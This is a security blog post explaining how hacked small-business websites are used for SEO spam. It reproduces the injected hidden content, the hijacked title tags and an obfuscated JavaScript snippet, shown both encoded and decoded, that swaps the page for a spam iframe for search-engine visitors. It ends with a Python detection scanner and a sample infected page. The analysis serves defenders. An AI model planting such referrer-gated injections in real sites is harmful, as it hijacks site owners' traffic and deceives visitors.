Security Research: Hijacking Your Domain Authority

Anyone who owns a blog knows that they’re going to get a bunch of spam posts. Frequently, these are intended as spam for SEO purposes: create a bunch of low-quality links that all say “Buy Fake Watches Filled With Erectile Dysfunction Pills”, linking back to the “money site” where you actually sell the goods. Usually, this was either a keyword-stuffed domain (gobuycheapfakewatches2014now.info) or a complete nonsense domain (etroigjfrhnjlkfhjgh.info), because nobody wanted to spend money on a quality domain with real rankings to run the scam.

Lately, I noticed a new trend. Very spammy anchor text, linked to legitimate looking domains. When you loaded the pages up, they looked and felt like normal websites, with nothing to do with the original anchor text. Where’s the business plan?

The interesting thing happens beneath the surface. They’ve been compromised. While the sites themselves continue to function normally, you see a little extra content added into the middle of their code.

The site we investigated had a conventional, albeit old-fashioned, table layout, with one extra table cell:

<td style="display:none">
[Three paragraphs about "outlet sales" of purses snipped, each with their own well-optimized header tag]
</td>

While the content was structured well for SEO, it’s still meaningless. Users won’t see it, and since it resides in a table cell explicitly styled “display:none”, search engines will be prone to discount it as unimportant.

It doesn’t even have any obvious link-building power, because the injected text has no outbound links.

Second, we noticed the title has been replaced. While the site it’s on is a small IT consulting company, the title and meta tags are all:

<title>Michael Kors Canada Outlet Handbags Are On Hot Sale Online Now
</title>
<meta name="description" content="Michael Kors Canada online sale now up to 70% off! With fabulous sale, it's time to change your attitude. Just buy Michael Kors outlet handbags in the our store, you can win the others with our best service now, our Michael Kors outlet store can offer you Michael Kors wallet,Michael Kors watches, Michael Kors bags are waiting for you in our store, welcome to buy!" />

Okay… this goes along with the injected message. More about fake handbags. But still no clear monetization plan.

The more interesting part is happening at the bottom of the code. A second injection includes some JavaScript:

var tJDfHyR1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x72\x65\x66\x65\x72\x72\x65\x72"];if(tJDfHyR1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x67\x6f\x6f\x67\x6c\x65")>0 || tJDfHyR1["\x69\x6e\x64\x65\x78\x4f\x66"]....

When this code is executed, all those \x?? hex escapes are decoded into normal characters, yielding the following code:

var tJDfHyR1=window["document"]["referrer"];if(tJDfHyR1["indexOf"]("google")>0 || tJDfHyR1["indexOf"]("bing")>0 || tJDfHyR1["indexOf"]("yahoo")>0 || tJDfHyR1["indexOf"]("aol")>0|| tJDfHyR1["indexOf"]("ask")>0){window["document"]["body"]["innerHTML"]="<iframe width='100%' scrolling='no' height='3200' frameborder='0' src='http://www.SPAMMY SITE HERE.com'></iframe>";}

In short, what you have here says: “If the user has come from Google, Yahoo, AOL.com, Bing, or Ask Jeeves, rip out the site content and display a frame for the real ‘Money Site’.” If you followed the link from the original spam, you’d never see it load. If you came to the site directly, or followed a third-party link, you’d never see the fake site. Only search engine traffic is affected.

Suddenly, all the changes above make perfect sense. The title tags and minor injection of relevant content will help the site rank and display properly in searches for the spammer’s chosen keyword.

They’re hijacking your domain’s age and authority to rank comparatively well for “Michael Kors Purses”. But far worse, they’ll completely sacrifice any search engine traffic you get. If you had been getting visitors for your brands, your line of business, or your regional presence, too bad. All they’re gonna see is bootleg handbags.

The good news is that it’s a pretty blatant thing: the code’s right in your HTML and can easily be checked for.
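As an added illustration (not code from the original post), here is a small Python scanner that checks a saved copy of a page’s HTML for the three signs described above: a replaced title, a hidden table cell stuffed with header tags, and a hex-escaped script that swaps the body for an iframe based on document.referrer. The sample HTML is constructed to mimic the injection; the site name and the spam domain are placeholders.

```python
import re

# Constructed sample page (not the compromised site) reproducing the three
# injections described above: swapped title, hidden table cell, escaped script.
SAMPLE_HTML = """<html><head>
<title>Michael Kors Canada Outlet Handbags Are On Hot Sale Online Now</title>
</head><body><table><tr><td>Acme IT Consulting - Managed Services</td>
<td style="display:none"><h2>Outlet Sale</h2><p>Purses at 70% off.</p></td>
</tr></table>
<script>var r=window["\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74"]["\\x72\\x65\\x66\\x65\\x72\\x72\\x65\\x72"];
if(r["\\x69\\x6e\\x64\\x65\\x78\\x4f\\x66"]("\\x67\\x6f\\x6f\\x67\\x6c\\x65")>0){
window["document"]["body"]["innerHTML"]="<iframe src='http://spam.invalid'></iframe>";}
</script></body></html>"""

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

def decode_hex_escapes(js: str) -> str:
    """Turn \\xNN sequences back into characters, as the JS engine would."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), js)

def scan_page(html: str, expected_title_word: str) -> list:
    """Return a list of findings; an empty list means none of the signs appeared."""
    findings = []
    m = re.search(r"<title>(.*?)</title>", html, re.S | re.I)
    title = m.group(1).strip() if m else ""
    if expected_title_word.lower() not in title.lower():
        findings.append(f"title replaced: {title!r}")
    # Hidden cells carrying header tags: keyword text no visitor will ever see.
    for tag, body in re.findall(
            r"<(td|div)[^>]*display\s*:\s*none[^>]*>(.*?)</\1>", html, re.S | re.I):
        if re.search(r"<h[1-6]", body, re.I):
            findings.append(f"hidden <{tag}> with header tags")
    # Scripts: decode the escapes, then look for a referrer-gated body swap.
    for script in re.findall(r"<script[^>]*>(.*?)</script>", html, re.S | re.I):
        escapes = len(HEX_ESCAPE.findall(script))
        js = decode_hex_escapes(script)
        if escapes >= 8:
            findings.append(f"script with {escapes} hex-escaped characters")
        if all(k in js for k in ("referrer", "indexOf", "innerHTML", "<iframe")):
            findings.append("referrer-gated iframe swap of document body")
    return findings

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_HTML, "Acme"):
        print(finding)
```

Run it against the HTML your server actually sends (fetch it with a search-engine Referer header as well as without), since the injected script only changes what the browser shows, not what the server stores.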
